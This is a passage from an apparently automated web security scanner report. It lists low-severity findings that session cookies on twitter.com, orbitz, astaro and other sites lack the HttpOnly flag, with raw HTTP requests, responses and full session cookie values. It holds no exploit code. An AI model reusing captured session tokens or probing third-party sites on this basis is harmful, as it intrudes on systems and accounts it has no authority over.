_twitter_sess=BAh7CDoHaWQiJTVkYzQ0Nzg5MDIxYmYxZjJhODhiMWI5ODRkMmYyMTJlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIV06k4S0B--5f18d466d1bff4879062521feb9e994bd7aaf156; domain=.twitter.com; path=/
k=173.193.214.243.1296570797643297; path=/; expires=Tue, 08-Feb-11 14:33:17 GMT; domain=.twitter.com
guest_id=129657079765322715; path=/; expires=Thu, 03 Mar 2011 14:33:17 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sp_tx HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.115. http://twitter.com/toptweets/favorites previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/toptweets/favorites

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /toptweets/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.116. http://twitter.com/tos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/tos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.117. http://twitter.com/widgets previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/widgets

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widgets HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 301 Moved Permanently
Date: Wed, 02 Feb 2011 16:31:50 GMT
Server: hi
Status: 301 Moved Permanently
X-Transaction: 1296664310-37706-43310
Last-Modified: Wed, 02 Feb 2011 16:31:50 GMT
Location: http://twitter.com/about/resources/widgets
X-Runtime: 0.01242
Content-Type: text/html; charset=utf-8
Content-Length: 108
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/about/resources/widgets">redirected</a>.</body></html>

12.118. https://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.119. https://twitter.com/about previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/about

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.120. https://twitter.com/about/contact previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/about/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.121. https://twitter.com/about/resources previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/about/resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.122. https://twitter.com/account/complete previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/account/complete

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.123. https://twitter.com/account/resend_password previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/account/resend_password

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.124. https://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.125. https://twitter.com/privacy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.126. https://twitter.com/sessions previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/sessions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6%250AC25vdGljZTAGOgpAdXNlZHsGOwlUOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1%250ANTg3NTBiY2U0NmNhODk%253D--fab0553612e262a6d5d29dd57d955d0f7cbb2852; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.127. https://twitter.com/sessions/change_locale previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/sessions/change_locale

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.128. https://twitter.com/sessions/destroy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/sessions/destroy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.129. https://twitter.com/signup previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/signup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.130. https://twitter.com/tos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://twitter.com
Path:	/tos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.131. http://updates.orbitz.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://updates.orbitz.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

traveler_update_session=BAh7CToOcmV0dXJuX3RvIgYvOhFsYXN0X3JlcXVlc3RABjoQbGFzdF92aWV3%250AZWRABiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1848cb98c769e595ff92d0c71ba7b529ea2e7b8c; path=/
traveler_update_visitor=C108D6A5A5D4BD8; path=/; expires=Tue, 02 Feb 2016 15:42:34 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.132. http://updates.orbitz.com/flight_status previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://updates.orbitz.com
Path:	/flight_status

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

traveler_update_session=BAh7CToOcmV0dXJuX3RvIhMvZmxpZ2h0X3N0YXR1czoRbGFzdF9yZXF1ZXN0%250AQAY6EGxhc3Rfdmlld2VkQAYiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--2e47e384fcf267e3ac43c1147866adf06a386ff2; path=/
traveler_update_visitor=AA38ABAD2706415; path=/; expires=Tue, 02 Feb 2016 15:42:36 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /flight_status HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.133. http://www.amihackerproof.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amihackerproof.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=kvsmh7aqseu6mg7vmpa5j24af6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.amihackerproof.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:54 GMT
Server: Apache
Set-Cookie: PHPSESSID=kvsmh7aqseu6mg7vmpa5j24af6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7235
Connection: close
Content-Type: text/html

<html>
<head>
<meta name="description" content="AmIHackerProof.com Is The most Powerful And Accurate Online Vulnerability & Penetration Scanner In The World." />
<meta name="keywords" content="
...[SNIP]...

12.134. http://www.answerbag.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.answerbag.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=b8649a886ef35c1430866056a3b2b71c; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.answerbag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.135. https://www.astaro.co.uk/beacon/(beid previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.astaro.co.uk
Path:	/beacon/(beid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

eZSESSIDeu=bv7eodcrp0t34v0n39i8932ve0; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.136. https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.astaro.com
Path:	/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eZSESSIDen=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDch=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDau=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/
eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:55:56 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.137. https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.astaro.com
Path:	/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eZSESSIDen=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDch=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDau=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/
eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; expires=Wed, 01-Feb-2012 13:57:00 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.138. https://www.astaro.com/user/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.astaro.com
Path:	/user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

eZSESSIDen=3arq6oafh8mmgccr289cup83h1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.139. https://www.astaro.de/beacon/(beid previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.astaro.de
Path:	/beacon/(beid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

eZSESSIDde=osr305vfiegtr4m0rumdbdt3r7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.140. http://www.astaro.es/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.astaro.es
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

eZSESSIDes=va54a0ioaplpc7s3t9i0p3vsb3; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.astaro.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.141. https://www.astaro.net/beacon/(beid previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.astaro.net
Path:	/beacon/(beid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

eZSESSIDen=bsb7dte2ge5s4c59fbs7127q65; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.142. http://www.autocheck.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.autocheck.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=d1zevGA8SakdljQcN3; path=/
Apache=173.193.214.243.709129666138539; path=/; expires=Fri, 04-Mar-11 15:43:05 GMT
referralCookie=d1zevGA8SakdljQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:09 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?WT.mc_id=3499&siteID=3499 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.143. http://www.bbbonline.org/cks.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bbbonline.org
Path:	/cks.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAQCTBBTR=INKGGBJAFLFMOFPALBDGFNMN; path=/
BBB_Cookie=2661423788.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cks.asp HTTP/1.1
Host: www.bbbonline.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Wed, 02 Feb 2011 15:42:12 GMT
Location: https://www.bbb.org/online/consumer/cks.aspx?ID=&n=67973
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQCTBBTR=INKGGBJAFLFMOFPALBDGFNMN; path=/
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 15:43:11 GMT
Connection: close
Set-Cookie: BBB_Cookie=2661423788.20480.0000; path=/

12.144. http://www.benjaminsterling.com/experiments/jqShuffle/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.benjaminsterling.com
Path:	/experiments/jqShuffle/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=cf9969fe4a0abd1e67fcd6bbd18f7f6a; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experiments/jqShuffle/ HTTP/1.1
Host: www.benjaminsterling.com
Accept: */*
Accept-Language: en
